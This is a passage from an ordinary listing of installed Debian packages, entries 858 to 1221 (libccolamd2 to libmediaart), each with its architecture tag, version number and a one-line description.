  858. libccolamd2:i386 1:4.5.4-1 constrained column approximate library for sparse matrices
  859. libcdio-cdda1:i386 0.83-4.3+b1 library to read and control digital audio CDs
  860. libcdio-paranoia1:i386 0.83-4.3+b1 library to read digital audio CDs with error correction
  861. libcdio13:i386 0.83-4.3+b1 library to read and control CD-ROM
  862. libcdparanoia0:i386 3.10.2+debian-11 audio extraction tool for sampling CDs (library)
  863. libcdr-0.1-1:i386 0.1.3-3+b1 library for reading and converting Corel DRAW files
  864. libchamplain-0.12-0:i386 0.12.15-1 C library providing ClutterActor to display maps
  865. libchamplain-gtk-0.12-0:i386 0.12.15-1 Gtk+ widget to display maps
  866. libcheese-gtk25:i386 3.22.1-1+b1 tool to take pictures and videos from your webcam - widgets
  867. libcheese8:i386 3.22.1-1+b1 tool to take pictures and videos from your webcam - base library
  868. libcholmod3:i386 1:4.5.4-1 sparse Cholesky factorization library for sparse matrices
  869. libchromaprint1:i386 1.4.2-1 audio fingerprint library
  870. libclass-isa-perl 0.36-5 report the search path for a class's ISA tree
  871. libclucene-contribs1v5:i386 2.3.3.4+dfsg-1 language specific text analyzers (runtime)
  872. libclucene-core1v5:i386 2.3.3.4+dfsg-1 core library for full-featured text search engine (runtime)
  873. libclutter-1.0-0:i386 1.26.0+dfsg-3 Open GL based interactive canvas library
  874. libclutter-1.0-common 1.26.0+dfsg-3 Open GL based interactive canvas library (common files)
  875. libclutter-gst-3.0-0:i386 3.0.24-1 Open GL based interactive canvas library GStreamer elements
  876. libclutter-gtk-1.0-0:i386 1.8.2-2 Open GL based interactive canvas library GTK+ widget
  877. libcmis-0.5-5v5 0.5.1+git20160603-3+b1 CMIS protocol client library
  878. libcogl-common 1.22.2-2 Object oriented GL/GLES Abstraction/Utility Layer (common files)
  879. libcogl-pango20:i386 1.22.2-2 Object oriented GL/GLES Abstraction/Utility Layer
  880. libcogl-path20:i386 1.22.2-2 Object oriented GL/GLES Abstraction/Utility Layer
  881. libcogl20:i386 1.22.2-2 Object oriented GL/GLES Abstraction/Utility Layer
  882. libcolamd2:i386 1:4.5.4-1 column approximate minimum degree ordering library for sparse matrices
  883. libcolord-gtk1:i386 0.1.26-1.1 GTK+ convenience library for interacting with colord
  884. libcolord2:i386 1.3.3-2 system service to manage device colour profiles -- runtime
  885. libcolorhug2:i386 1.3.3-2 library to access the ColorHug colourimeter -- runtime
  886. libcomerr2:i386 1.43.4-2 common error description library
  887. libcrack2:i386 2.9.2-5 pro-active password checker library
  888. libcroco3:i386 0.6.11-3 Cascading Style Sheet (CSS) parsing and manipulation toolkit
  889. libcryptsetup4:i386 2:1.7.3-4 disk encryption support - shared library
  890. libcryptui0a:i386 3.12.2-3 UI library for OpenPGP prompts
  891. libcrystalhd3:i386 1:0.0~git20110715.fdd2f19-12 Crystal HD Video Decoder (shared library)
  892. libcue1 1.4.0-1 CUE Sheet Parser Library
  893. libcups2:i386 2.2.1-8 Common UNIX Printing System(tm) - Core library
  894. libcupscgi1:i386 2.2.1-8 Common UNIX Printing System(tm) - CGI library
  895. libcupsfilters1:i386 1.11.6-3 OpenPrinting CUPS Filters - Shared library
  896. libcupsimage2:i386 2.2.1-8 Common UNIX Printing System(tm) - Raster image library
  897. libcupsmime1:i386 2.2.1-8 Common UNIX Printing System(tm) - MIME library
  898. libcupsppdc1:i386 2.2.1-8 Common UNIX Printing System(tm) - PPD manipulation library
  899. libcurl3:i386 7.52.1-5 easy-to-use client-side URL transfer library (OpenSSL flavour)
  900. libcurl3-gnutls:i386 7.52.1-5 easy-to-use client-side URL transfer library (GnuTLS flavour)
  901. libdaemon0:i386 0.14-6 lightweight C library for daemons - runtime library
  902. libdatrie1:i386 0.2.10-4+b1 Double-array trie library
  903. libdb5.3:i386 5.3.28-12+b1 Berkeley v5.3 Database Libraries [runtime]
  904. libdbus-1-3:i386 1.10.18-1 simple interprocess messaging system (library)
  905. libdbus-glib-1-2:i386 0.108-2 simple interprocess messaging system (GLib-based shared library)
  906. libdc1394-22:i386 2.2.5-1 high level programming interface for IEEE 1394 digital cameras
  907. libdca0:i386 0.0.5-10 decoding library for DTS Coherent Acoustics streams
  908. libdconf1:i386 0.26.0-2+b1 simple configuration storage system - runtime library
  909. libde265-0:i386 1.0.2-2+b2 Open H.265 video codec implementation
  910. libdebconfclient0:i386 0.227 Debian Configuration Management System (C-implementation library)
  911. libdee-1.0-4 1.0.10-3.1+b2 model to synchronize mutiple instances over DBus - shared lib
  912. libdevmapper1.02.1:i386 2:1.02.137-2 Linux Kernel Device Mapper userspace library
  913. libdiscover2 2.1.2-7.1 hardware identification library
  914. libdjvulibre-text 3.5.27.1-7 Linguistic support files for libdjvulibre
  915. libdjvulibre21:i386 3.5.27.1-7 Runtime support for the DjVu image format
  916. libdleyna-connector-dbus-1.0-1:i386 0.2.0-1 DBus connector module for the dLeyna services
  917. libdleyna-core-1.0-3:i386 0.4.0-1 Utility functions for higher level dLeyna components
  918. libdmapsharing-3.0-2:i386 2.9.37-1 DMAP client and server library - runtime
  919. libdns-export162 1:9.10.3.dfsg.P4-12.3+deb9u2 Exported DNS Shared Library
  920. libdns162:i386 1:9.10.3.dfsg.P4-12.3+deb9u2 DNS Shared Library used by BIND
  921. libdotconf0:i386 1.3-0.2 Configuration file parser library - runtime files
  922. libdrm-amdgpu1:i386 2.4.74-1 Userspace interface to amdgpu-specific kernel DRM services -- runtime
  923. libdrm-intel1:i386 2.4.74-1 Userspace interface to intel-specific kernel DRM services -- runtime
  924. libdrm-nouveau2:i386 2.4.74-1 Userspace interface to nouveau-specific kernel DRM services -- runtime
  925. libdrm-radeon1:i386 2.4.74-1 Userspace interface to radeon-specific kernel DRM services -- runtime
  926. libdrm2:i386 2.4.74-1 Userspace interface to kernel DRM services -- runtime
  927. libdv4:i386 1.0.0-11 software library for DV format digital video (runtime lib)
  928. libdvdnav4:i386 5.0.3-3 DVD navigation library
  929. libdvdread4:i386 5.0.3-2 library for reading DVDs
  930. libe-book-0.1-1:i386 0.1.2-4 library for reading and converting various e-book formats
  931. libebackend-1.2-10:i386 3.22.7-1 Utility library for evolution data servers
  932. libebook-1.2-16:i386 3.22.7-1 Client library for evolution address books
  933. libebook-contacts-1.2-2:i386 3.22.7-1 Client library for evolution contacts books
  934. libebur128-1:i386 1.2.2-2 implementation of the EBU R128 loudness standard
  935. libecal-1.2-19:i386 3.22.7-1 Client library for evolution calendars
  936. libedata-book-1.2-25:i386 3.22.7-1 Backend library for evolution address books
  937. libedata-cal-1.2-28:i386 3.22.7-1 Backend library for evolution calendars
  938. libedataserver-1.2-22:i386 3.22.7-1 Utility library for evolution data servers
  939. libedataserverui-1.2-1:i386 3.22.7-1 Utility library for evolution data servers
  940. libedit2:i386 3.1-20160903-3 BSD editline and history libraries
  941. libegl1-mesa:i386 13.0.6-1+b2 free implementation of the EGL API -- runtime
  942. libelf1:i386 0.168-1 library to read and write ELF files
  943. libenca0:i386 1.19-1+b1 Extremely Naive Charset Analyser - shared library files
  944. libenchant1c2a:i386 1.6.0-11+b1 Wrapper library for various spell checker engines (runtime libs)
  945. libencode-locale-perl 1.05-1 utility to determine the locale encoding
  946. libeot0:i386 0.01-4+b1 Library for parsing/converting Embedded OpenType files
  947. libepoxy0:i386 1.3.1-2 OpenGL function pointer management library
  948. libept1.5.0:i386 1.1+nmu3+b1 High-level library for managing Debian package information
  949. liberror-perl 0.17024-1 Perl module for error/exception handling in an OO-ish way
  950. libestr0 0.1.10-2 Helper functions for handling strings (lib)
  951. libetonyek-0.1-1:i386 0.1.6-5 library for reading and converting Apple Keynote presentations
  952. libevdev2:i386 1.5.6+dfsg-1 wrapper library for evdev devices
  953. libevdocument3-4:i386 3.22.1-3+deb9u1 Document (PostScript, PDF) rendering library
  954. libevent-2.0-5:i386 2.0.21-stable-3 Asynchronous event notification library
  955. libevolution 3.22.6-1 evolution libraries
  956. libevview3-3:i386 3.22.1-3+deb9u1 Document (PostScript, PDF) rendering library - Gtk+ widgets
  957. libexempi3:i386 2.4.1-1 library to parse XMP metadata (Library)
  958. libexif12:i386 0.6.21-2+b2 library to parse EXIF files
  959. libexiv2-14:i386 0.25-3.1 EXIF/IPTC/XMP metadata manipulation library
  960. libexpat1:i386 2.2.0-2+deb9u1 XML parsing C library - runtime library
  961. libexttextcat-2.0-0:i386 3.4.4-2+b1 Language detection library
  962. libexttextcat-data 3.4.4-2 Language detection library - data files
  963. libfaad2:i386 2.8.0~cvs20161113-1 freeware Advanced Audio Decoder - runtime files
  964. libfastjson4:i386 0.99.4-1 fast json library for C
  965. libfdisk1:i386 2.29.2-1 fdisk partitioning library
  966. libffi6:i386 3.2.1-6 Foreign Function Interface library runtime
  967. libfftw3-double3:i386 3.3.5-3 Library for computing Fast Fourier Transforms - Double precision
  968. libfftw3-single3:i386 3.3.5-3 Library for computing Fast Fourier Transforms - Single precision
  969. libfile-basedir-perl 0.07-1 Perl module to use the freedesktop basedir specification
  970. libfile-copy-recursive-perl 0.38-1 Perl extension for recursively copying files and directories
  971. libfile-desktopentry-perl 0.22-1 Perl module to handle freedesktop .desktop files
  972. libfile-listing-perl 6.04-1 module to parse directory listings
  973. libfile-mimeinfo-perl 0.27-1 Perl module to determine file types
  974. libflac8:i386 1.3.2-1 Free Lossless Audio Codec - runtime C library
  975. libflite1:i386 2.0.0-release-3+b1 Small run-time speech synthesis engine - shared libraries
  976. libfluidsynth1:i386 1.1.6-4 Real-time MIDI software synthesizer (runtime library)
  977. libfolks-eds25:i386 0.11.3-2 Evolution-data-server backend for libfolks
  978. libfolks-telepathy25:i386 0.11.3-2 Telepathy backend for libfolks
  979. libfolks25:i386 0.11.3-2 library to aggregates people into metacontacts
  980. libfont-afm-perl 1.20-2 Font::AFM - Interface to Adobe Font Metrics files
  981. libfontconfig1:i386 2.11.0-6.7+b1 generic font configuration library - runtime
  982. libfontembed1:i386 1.11.6-3 OpenPrinting CUPS Filters - Font Embed Shared library
  983. libfontenc1:i386 1:1.1.3-1+b2 X11 font encoding library
  984. libfreehand-0.1-1 0.1.1-2 Library for parsing the FreeHand file format structure
  985. libfreerdp-cache1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (cache library)
  986. libfreerdp-codec1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (codec library)
  987. libfreerdp-common1.1.0:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (common library)
  988. libfreerdp-core1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (core library)
  989. libfreerdp-crypto1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (freerdp-crypto library)
  990. libfreerdp-gdi1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (GDI library)
  991. libfreerdp-locale1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (locale library)
  992. libfreerdp-primitives1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (primitives library)
  993. libfreerdp-utils1.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Free Remote Desktop Protocol library (freerdp-utils library)
  994. libfreetype6:i386 2.6.3-3.2 FreeType 2 font engine, shared library files
  995. libfribidi0:i386 0.19.7-1+b1 Free Implementation of the Unicode BiDi algorithm
  996. libfuse2:i386 2.9.7-1 Filesystem in Userspace (library)
  997. libfwupd1:i386 0.7.4-2 Firmware update daemon library
  998. libgail-3-0:i386 3.22.11-1 GNOME Accessibility Implementation Library -- shared libraries
  999. libgail-common:i386 2.24.31-2 GNOME Accessibility Implementation Library -- common modules
  1000. libgail18:i386 2.24.31-2 GNOME Accessibility Implementation Library -- shared libraries
  1001. libgbm1:i386 13.0.6-1+b2 generic buffer management API -- runtime
  1002. libgc1c2:i386 1:7.4.2-8 conservative garbage collector for C and C++
  1003. libgcab-1.0-0:i386 0.7-2 Microsoft Cabinet file manipulation library
  1004. libgcc1:i386 1:6.3.0-18 GCC support library
  1005. libgck-1-0:i386 3.20.0-5.1 Glib wrapper library for PKCS#11 - runtime
  1006. libgcr-3-common 3.20.0-5.1 Library for Crypto UI related tasks - common files
  1007. libgcr-base-3-1:i386 3.20.0-5.1 Library for Crypto related tasks
  1008. libgcr-ui-3-1:i386 3.20.0-5.1 Library for Crypto UI related tasks
  1009. libgcrypt20:i386 1.7.6-2+deb9u1 LGPL Crypto library - runtime library
  1010. libgd3:i386 2.2.4-2+deb9u1 GD Graphics Library
  1011. libgdata-common 0.17.6-2 Library for accessing GData webservices - common data files
  1012. libgdata22:i386 0.17.6-2 Library for accessing GData webservices - shared libraries
  1013. libgdbm3:i386 1.8.3-14 GNU dbm database routines (runtime version)
  1014. libgdict-1.0-10:i386 3.20.0-3+b1 GNOME Dictionary base library - runtime
  1015. libgdict-common 3.20.0-3 GNOME Dictionary base library - common files
  1016. libgdk-pixbuf2.0-0:i386 2.36.5-2 GDK Pixbuf library
  1017. libgdk-pixbuf2.0-common 2.36.5-2 GDK Pixbuf library - data files
  1018. libgdm1 3.22.3-3 GNOME Display Manager (shared library)
  1019. libgee-0.8-2:i386 0.18.1-1 GObject based collection and utility library
  1020. libgegl-0.3-0:i386 0.3.8-4 Generic Graphics Library
  1021. libgeoclue-2-0:i386 2.4.5-1 convenience library to interact with geoinformation service
  1022. libgeocode-glib0:i386 3.20.1-2 geocoding and reverse geocoding GLib library using Nominatim
  1023. libgeoip1:i386 1.6.9-4 non-DNS IP-to-country resolver library
  1024. libgepub0:i386 0.4-1 library to read epub files
  1025. libgexiv2-2:i386 0.10.4-2 GObject-based wrapper around the Exiv2 library
  1026. libgfbgraph-0.2-0:i386 0.2.3-1+b2 GObject library for Facebook Graph API
  1027. libgfortran3:i386 6.3.0-18 Runtime library for GNU Fortran applications
  1028. libgif7:i386 5.1.4-0.4 library for GIF images (library)
  1029. libgimp2.0 2.8.18-1 Libraries for the GNU Image Manipulation Program
  1030. libgirepository-1.0-1:i386 1.50.0-1+b1 Library for handling GObject introspection data (runtime library)
  1031. libgit2-24:i386 0.25.1+really0.24.6-1 low-level Git library
  1032. libgit2-glib-1.0-0:i386 0.24.4-1 glib wrapper library around the libgit2 git access library
  1033. libgjs0e 1.46.0-1+b2 Mozilla-based javascript bindings for the GNOME platform
  1034. libgl1-mesa-dri:i386 13.0.6-1+b2 free implementation of the OpenGL API -- DRI modules
  1035. libgl1-mesa-glx:i386 13.0.6-1+b2 free implementation of the OpenGL API -- GLX runtime
  1036. libglapi-mesa:i386 13.0.6-1+b2 free implementation of the GL API -- shared library
  1037. libgles2-mesa:i386 13.0.6-1+b2 free implementation of the OpenGL|ES 2.x API -- runtime
  1038. libglew2.0:i386 2.0.0-3+b1 OpenGL Extension Wrangler - runtime environment
  1039. libglib-perl 3:1.324-1 interface to the GLib and GObject libraries
  1040. libglib2.0-0:i386 2.50.3-2 GLib library of C routines
  1041. libglib2.0-bin 2.50.3-2 Programs for the GLib library
  1042. libglib2.0-data 2.50.3-2 Common files for GLib library
  1043. libglibmm-2.4-1v5:i386 2.50.0-1 C++ wrapper for the GLib toolkit (shared libraries)
  1044. libgltf-0.0-0v5:i386 0.0.2-5 Library for rendering glTF models
  1045. libglu1-mesa:i386 9.0.0-2.1 Mesa OpenGL utility library (GLU)
  1046. libgme0:i386 0.6.0-4 Playback library for video game music files - shared library
  1047. libgmime-2.6-0:i386 2.6.22+dfsg2-1 MIME message parser and creator library
  1048. libgmp10:i386 2:6.1.2+dfsg-1 Multiprecision arithmetic library
  1049. libgnome-autoar-0-0:i386 0.1.1-4+b1 Archives integration support for GNOME
  1050. libgnome-autoar-common 0.1.1-4 Archives integration support for GNOME - common files
  1051. libgnome-autoar-gtk-0-0:i386 0.1.1-4+b1 GTK+ widgets for the GNOME Autoar library
  1052. libgnome-bluetooth13:i386 3.20.1-1 GNOME Bluetooth tools - support library
  1053. libgnome-desktop-3-12:i386 3.22.2-1 Utility library for loading .desktop files - runtime files
  1054. libgnome-games-support-1-2:i386 1.2.1-1 library for common functions of GNOME games
  1055. libgnome-games-support-common 1.2.1-1 library for common functions of GNOME games (common files)
  1056. libgnome-keyring-common 3.12.0-1 GNOME keyring services library - data files
  1057. libgnome-keyring0:i386 3.12.0-1+b2 GNOME keyring services library
  1058. libgnome-menu-3-0 3.13.3-9 GNOME implementation of the freedesktop menu specification
  1059. libgnomekbd-common 3.22.0.1-1 GNOME library to manage keyboard configuration - common files
  1060. libgnomekbd8:i386 3.22.0.1-1+b1 GNOME library to manage keyboard configuration - shared library
  1061. libgnutls30:i386 3.5.8-5+deb9u1 GNU TLS library - main runtime library
  1062. libgoa-1.0-0b:i386 3.22.5-1 library for GNOME Online Accounts
  1063. libgoa-1.0-common 3.22.5-1 library for GNOME Online Accounts - common files
  1064. libgoa-backend-1.0-1:i386 3.22.5-1 backend library for GNOME Online Accounts
  1065. libgom-1.0-0:i386 0.3.2-2 Object mapper from GObjects to SQLite
  1066. libgom-1.0-common 0.3.2-2 libgom architecture-independent files
  1067. libgomp1:i386 6.3.0-18 GCC OpenMP (GOMP) support library
  1068. libgpg-error0:i386 1.26-2 library for common error values and messages in GnuPG components
  1069. libgpgme11:i386 1.8.0-3+b2 GPGME - GnuPG Made Easy (library)
  1070. libgphoto2-6:i386 2.5.12-1 gphoto2 digital camera library
  1071. libgphoto2-l10n 2.5.12-1 gphoto2 digital camera library - localized messages
  1072. libgphoto2-port12:i386 2.5.12-1 gphoto2 digital camera port library
  1073. libgpm2:i386 1.20.4-6.2+b1 General Purpose Mouse - shared library
  1074. libgpod-common 0.8.3-8.2 common files for libgpod
  1075. libgpod4:i386 0.8.3-8.2 library to read and write songs and artwork to an iPod
  1076. libgraphite2-3:i386 1.3.10-1 Font rendering engine for Complex Scripts -- library
  1077. libgrilo-0.3-0:i386 0.3.2-2 Framework for discovering and browsing media - Shared libraries
  1078. libgs9:i386 9.20~dfsg-3.2 interpreter for the PostScript language and for PDF - Library
  1079. libgs9-common 9.20~dfsg-3.2 interpreter for the PostScript language and for PDF - common files
  1080. libgsf-1-114:i386 1.14.41-1 Structured File Library - runtime version
  1081. libgsf-1-common 1.14.41-1 Structured File Library - common files
  1082. libgsf-bin 1.14.41-1 Structured File Library - programs
  1083. libgsl2:i386 2.3+dfsg-1 GNU Scientific Library (GSL) -- library package
  1084. libgsm1:i386 1.0.13-4+b2 Shared libraries for GSM speech compressor
  1085. libgsound0:i386 1.0.2-1+b1 small library for playing system sounds
  1086. libgspell-1-1:i386 1.2.2-1 spell-checking library for GTK+ applications
  1087. libgspell-1-common 1.2.2-1 libgspell architecture-independent files
  1088. libgssapi-krb5-2:i386 1.15-1 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
  1089. libgssdp-1.0-3:i386 1.0.1-1 GObject-based library for SSDP
  1090. libgstreamer-plugins-bad1.0-0:i386 1.10.4-1 GStreamer development files for libraries from the "bad" set
  1091. libgstreamer-plugins-base1.0-0:i386 1.10.4-1 GStreamer libraries from the "base" set
  1092. libgstreamer1.0-0:i386 1.10.4-1 Core GStreamer libraries and elements
  1093. libgtk-3-0:i386 3.22.11-1 GTK+ graphical user interface library
  1094. libgtk-3-bin 3.22.11-1 programs for the GTK+ graphical user interface library
  1095. libgtk-3-common 3.22.11-1 common files for the GTK+ graphical user interface library
  1096. libgtk-vnc-2.0-0:i386 0.6.0-3 VNC viewer widget for GTK+3 (runtime libraries)
  1097. libgtk2-perl 2:1.2499-1 Perl interface to the 2.x series of the Gimp Toolkit library
  1098. libgtk2.0-0:i386 2.24.31-2 GTK+ graphical user interface library
  1099. libgtk2.0-bin 2.24.31-2 programs for the GTK+ graphical user interface library
  1100. libgtk2.0-common 2.24.31-2 common files for the GTK+ graphical user interface library
  1101. libgtkmm-2.4-1v5:i386 1:2.24.5-1 C++ wrappers for GTK+ (shared libraries)
  1102. libgtkmm-3.0-1v5:i386 3.22.0-1 C++ wrappers for GTK+ (shared libraries)
  1103. libgtksourceview-3.0-1:i386 3.22.2-1 shared libraries for the GTK+ syntax highlighting widget
  1104. libgtksourceview-3.0-common 3.22.2-1 common files for the GTK+ syntax highlighting widget
  1105. libgtkspell0 2.0.16-1.1 a spell-checking addon for GTK's TextView widget
  1106. libgtkspell3-3-0:i386 3.0.9-1 spell-checking addon for GTK+'s TextView widget
  1107. libgtop-2.0-10:i386 2.34.2-1 gtop system monitoring library (shared)
  1108. libgtop2-common 2.34.2-1 gtop system monitoring library (common)
  1109. libgucharmap-2-90-7:i386 1:9.0.2-1 Unicode browser widget library (shared library)
  1110. libgudev-1.0-0:i386 230-3 GObject-based wrapper library for libudev
  1111. libgupnp-1.0-4:i386 1.0.1-1 GObject-based library for UPnP
  1112. libgupnp-av-1.0-2 0.12.10-1 Audio/Visual utility library for GUPnP
  1113. libgupnp-dlna-2.0-3 0.10.5-3+b1 DLNA utility library for GUPnP
  1114. libgusb2:i386 0.2.9-1+b1 GLib wrapper around libusb1
  1115. libgutenprint2 5.2.11-1+b2 runtime for the Gutenprint printer driver library
  1116. libgvnc-1.0-0:i386 0.6.0-3 VNC GObject wrapper (runtime libraries)
  1117. libgweather-3-6:i386 3.20.4-1 GWeather shared library
  1118. libgweather-common 3.20.4-1 GWeather common files
  1119. libgxps2:i386 0.2.4-1+b1 handling and rendering XPS documents (library)
  1120. libharfbuzz-icu0:i386 1.4.2-1 OpenType text shaping engine ICU backend
  1121. libharfbuzz0b:i386 1.4.2-1 OpenType text shaping engine (shared library)
  1122. libhogweed4:i386 3.3-1+b1 low level cryptographic library (public-key cryptos)
  1123. libhpmud0:i386 3.16.11+repack0-3 HP Multi-Point Transport Driver (hpmud) run-time libraries
  1124. libhsqldb1.8.0-java 1.8.0.10+dfsg-7 Java SQL database engine
  1125. libhtml-form-perl 6.03-1 module that represents an HTML form element
  1126. libhtml-format-perl 2.12-1 module for transforming HTML into various formats
  1127. libhtml-parser-perl 3.72-3 collection of modules that parse HTML text documents
  1128. libhtml-tagset-perl 3.20-3 Data tables pertaining to HTML
  1129. libhtml-tree-perl 5.03-2 Perl module to represent and create HTML syntax trees
  1130. libhttp-cookies-perl 6.01-1 HTTP cookie jars
  1131. libhttp-daemon-perl 6.01-1 simple http server class
  1132. libhttp-date-perl 6.02-1 module of date conversion routines
  1133. libhttp-message-perl 6.11-1 perl interface to HTTP style messages
  1134. libhttp-negotiate-perl 6.00-2 implementation of content negotiation
  1135. libhttp-parser2.1:i386 2.1-2 parser for HTTP messages written in C
  1136. libhunspell-1.4-0:i386 1.4.1-2+b2 spell checker and morphological analyzer (shared library)
  1137. libhyphen0:i386 2.8.8-5 ALTLinux hyphenation library - shared library
  1138. libibus-1.0-5:i386 1.5.14-3 Intelligent Input Bus - shared library
  1139. libical2:i386 2.0.0-0.5+b1 iCalendar library implementation in C (runtime)
  1140. libice6:i386 2:1.0.9-2 X11 Inter-Client Exchange library
  1141. libicu57:i386 57.1-6 International Components for Unicode
  1142. libidn11:i386 1.33-1 GNU Libidn library, implementation of IETF IDN specifications
  1143. libidn2-0:i386 0.16-1 Internationalized domain names (IDNA2008) library
  1144. libiec61883-0:i386 1.2.0-2 partial implementation of IEC 61883 (shared lib)
  1145. libieee1284-3:i386 0.2.11-13 cross-platform library for parallel port access
  1146. libijs-0.35:i386 0.35-12 IJS raster image transport protocol: shared library
  1147. libilmbase12:i386 2.2.0-12 several utility libraries from ILM used by OpenEXR
  1148. libimage-magick-perl 8:6.9.7.4+dfsg-11+deb9u1 Perl interface to the ImageMagick graphics routines
  1149. libimage-magick-q16-perl 8:6.9.7.4+dfsg-11+deb9u1 Perl interface to the ImageMagick graphics routines -- Q16 version
  1150. libimobiledevice6:i386 1.2.0+dfsg-3.1 Library for communicating with the iPhone and iPod Touch
  1151. libinput-bin 1.6.3-1 input device management and event handling library - udev quirks
  1152. libinput10:i386 1.6.3-1 input device management and event handling library - shared library
  1153. libio-html-perl 1.001-1 open an HTML file with automatic charset detection
  1154. libio-socket-ssl-perl 2.044-1 Perl module implementing object oriented interface to SSL sockets
  1155. libip4tc0:i386 1.6.0+snapshot20161117-6 netfilter libip4tc library
  1156. libip6tc0:i386 1.6.0+snapshot20161117-6 netfilter libip6tc library
  1157. libipc-system-simple-perl 1.25-3 Perl module to run commands simply, with detailed diagnostics
  1158. libiptc0:i386 1.6.0+snapshot20161117-6 netfilter libiptc library
  1159. libiptcdata0 1.0.4-6+b1 Library to parse IPTC metadata
  1160. libisc-export160 1:9.10.3.dfsg.P4-12.3+deb9u2 Exported ISC Shared Library
  1161. libisc160:i386 1:9.10.3.dfsg.P4-12.3+deb9u2 ISC Shared Library used by BIND
  1162. libisccc140:i386 1:9.10.3.dfsg.P4-12.3+deb9u2 Command Channel Library used by BIND
  1163. libisccfg140:i386 1:9.10.3.dfsg.P4-12.3+deb9u2 Config File Handling Library used by BIND
  1164. libisl15:i386 0.18-1 manipulating sets and relations of integer points bounded by linear constraints
  1165. libisofs6:i386 1.4.6-1 library to create ISO 9660 images
  1166. libjack-jackd2-0:i386 1.9.10+20150825git1ed50c92~dfsg-5 JACK Audio Connection Kit (libraries)
  1167. libjansson4:i386 2.9-1 C library for encoding, decoding and manipulating JSON data
  1168. libjavascriptcoregtk-4.0-18:i386 2.16.3-2 JavaScript engine library from WebKitGTK+
  1169. libjbig0:i386 2.1-3.1+b2 JBIGkit libraries
  1170. libjbig2dec0:i386 0.13-4.1 JBIG2 decoder library - shared libraries
  1171. libjim0.76:i386 0.76-2+b1 small-footprint implementation of Tcl - shared library
  1172. libjpeg62-turbo:i386 1:1.5.1-2 libjpeg-turbo JPEG runtime library
  1173. libjson-glib-1.0-0:i386 1.2.6-1 GLib JSON manipulation library
  1174. libjson-glib-1.0-common 1.2.6-1 GLib JSON manipulation library (common files)
  1175. libjte1 1.20-2+b1 Jigdo Template Export - runtime library
  1176. libk5crypto3:i386 1.15-1 MIT Kerberos runtime libraries - Crypto Library
  1177. libkate1:i386 0.4.1-7+b1 Codec for karaoke and text encapsulation
  1178. libkeyutils1:i386 1.5.9-9 Linux Key Management Utilities (library)
  1179. libklibc 2.0.4-9 minimal libc subset for use with initramfs
  1180. libkmod2:i386 23-2 libkmod shared library
  1181. libkpathsea6:i386 2016.20160513.41080.dfsg-2 TeX Live: path search library for TeX (runtime part)
  1182. libkrb5-3:i386 1.15-1 MIT Kerberos runtime libraries
  1183. libkrb5support0:i386 1.15-1 MIT Kerberos runtime libraries - Support library
  1184. libksba8:i386 1.3.5-2 X.509 and CMS support library
  1185. liblangtag-common 0.6.2-1 library to access tags for identifying languages -- data
  1186. liblangtag1:i386 0.6.2-1 library to access tags for identifying languages
  1187. liblapack3 3.7.0-2 Library of linear algebra routines 3 - shared version
  1188. liblcms2-2:i386 2.8-4 Little CMS 2 color management library
  1189. liblcms2-utils 2.8-4 Little CMS 2 color management library (utilities)
  1190. libldap-2.4-2:i386 2.4.44+dfsg-5 OpenLDAP libraries
  1191. libldap-common 2.4.44+dfsg-5 OpenLDAP common files for libraries
  1192. libldb1:i386 2:1.1.27-1+b1 LDAP-like embedded database - shared library
  1193. liblilv-0-0 0.24.2~dfsg0-1 library for simple use of LV2 plugins
  1194. liblirc-client0:i386 0.9.4c-9 infra-red remote control support - client library
  1195. libllvm3.9:i386 1:3.9.1-9 Modular compiler and toolchain technologies, runtime library
  1196. liblocale-gettext-perl 1.07-3+b1 module using libc functions for internationalization in Perl
  1197. liblockfile-bin 1.14-1+b1 support binaries for and cli utilities based on liblockfile
  1198. liblogging-stdlog0:i386 1.0.5-2+b2 easy to use and lightweight logging library
  1199. liblognorm5:i386 2.0.1-1.1+b1 log normalizing library
  1200. liblouis-data 3.0.0-3 Braille translation library - data
  1201. liblouis12:i386 3.0.0-3+b1 Braille translation library - shared libs
  1202. liblqr-1-0:i386 0.4.2-2+b2 converts plain array images into multi-size representation
  1203. libltdl7:i386 2.4.6-2 System independent dlopen wrapper for GNU libtool
  1204. liblua5.2-0:i386 5.2.4-1.1+b2 Shared library for the Lua interpreter version 5.2
  1205. liblua5.3-0:i386 5.3.3-1 Shared library for the Lua interpreter version 5.3
  1206. liblwp-mediatypes-perl 6.02-1 module to guess media type for a file or a URL
  1207. liblwp-protocol-https-perl 6.06-2 HTTPS driver for LWP::UserAgent
  1208. liblwres141:i386 1:9.10.3.dfsg.P4-12.3+deb9u2 Lightweight Resolver Library used by BIND
  1209. liblz4-1:i386 0.0~r131-2+b1 Fast LZ compression algorithm library - runtime
  1210. liblzma5:i386 5.2.2-1.2+b1 XZ-format compression library
  1211. liblzo2-2:i386 2.08-1.2+b2 data compression library
  1212. libmad0:i386 0.15.1b-8 MPEG audio decoder library
  1213. libmagic-mgc 1:5.30-1 File type determination library using "magic" numbers (compiled magic file)
  1214. libmagic1:i386 1:5.30-1 Recognize the type of data in a file using "magic" numbers - library
  1215. libmagick++-6.q16-7:i386 8:6.9.7.4+dfsg-11+deb9u1 C++ interface to ImageMagick -- quantum depth Q16
  1216. libmagickcore-6.q16-3:i386 8:6.9.7.4+dfsg-11+deb9u1 low-level image manipulation library -- quantum depth Q16
  1217. libmagickwand-6.q16-3:i386 8:6.9.7.4+dfsg-11+deb9u1 image manipulation library -- quantum depth Q16
  1218. libmailtools-perl 2.18-1 Manipulate email in perl programs
  1219. libmbim-glib4:i386 1.14.0-1+b1 Support library to use the MBIM protocol
  1220. libmbim-proxy 1.14.0-1+b1 Proxy to communicate with MBIM ports
  1221. libmediaart-2.0-0:i386 1.9.0-2 media art extraction and cache management library
